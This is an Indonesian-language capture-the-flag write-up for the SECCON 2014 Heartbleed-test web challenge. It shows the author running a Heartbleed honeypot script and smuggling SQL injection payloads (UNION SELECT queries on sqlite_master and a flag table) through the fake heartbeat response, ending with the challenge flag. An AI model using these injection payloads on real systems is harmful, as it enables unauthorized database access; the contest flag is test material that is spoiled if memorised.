http://bleeding.pwn.seccon.jp/

website check heartbleed , yang datanya di simpan ke database coba kita scan

173.194.65.100:443

Connecting...
Sending Client Hello...
Waiting for Server Hello...
 ... received message: type = 22, ver = 0302, length = 61
 ... received message: type = 22, ver = 0302, length = 3852
 ... received message: type = 22, ver = 0302, length = 331
 ... received message: type = 22, ver = 0302, length = 4
Sending heartbeat request...

view-source

<!-- DEBUG: INSERT OK. TIME=1417889356 -->

INSERT OK berarti masuk ke database, sepertinya ini ada sql injection cara kita inject dengan membuat honeypot vulnerability Heartbleed

gunakan script packetstormsecurity.com/files/126068/hb_honeypot.pl.txt untuk membuat server anda menjadi vuln heartpbleed ,untuk bisa mengirimkan pesan inject nya jalankan honeypot dan scan ip anda

 

ifconfig

120.33.21.66

perl hb_honeypot.pl

Scan  120.33.21.66:443 < via website

DATABASE ERROR!!! near “.”: syntax error

select time from results where result=’Connecting… Sending Client Hello… Waiting for Server Hello… … received message: type = 24, ver = 0301, length = 249 … received message: type = 24, ver = 0301, length = 249 … received message: type = 24, ver = 0301, length = 249 … received message: type = 24, ver = 0301, length = 249 … received message: type = 22, ver = 0301, length = 1 Sending heartbeat request… … received message: type = 24, ver = 0301, length = 249

Received heartbeat response: 09809*)(*)(76&^%&(*&^7657332

Hi there! Your scan has been logged! Have no fear, this is for research only — We’re never gonna give you up, never gonna let you down! WARNING: server returned more data than it should – server is vulnerable! ‘;

Kita coba lagi inject

perl hb_honeypot.pl  ‘ UNION SELECT 1337 WHERE 1=1 OR ‘1’ LIKE ‘

view source

<!– DEBUG: INSERT OK. TIME=1337 –>

untuk mendapatkan list table

perl hb_honeypot.pl ‘ UNION SELECT group_concat(name) FROM sqlite_master WHERE type=’table’;–

view source
<!-- DEBUG: INSERT OK. TIME=results,ssFLGss,ttDMYtt -->

</span></pre>

ambil kolom flag dari tabel results

perl hb_honeypot.pl ‘ UNION SELECT flag from ssFLGss WHERE 1=1 OR ‘1’ LIKE ‘

view source

<!-- DEBUG: INSERT OK. TIME=SECCON{IknewIt!SQLiteAgain!!!} -->

Other Source :

https://github.com/ctfs/write-ups/tree/master/seccon-ctf-2014/bleeding-heartbleed-test-web

http://tasteless.eu/2014/12/seccon-ctf-2014-online-qualifications-web300-writeup/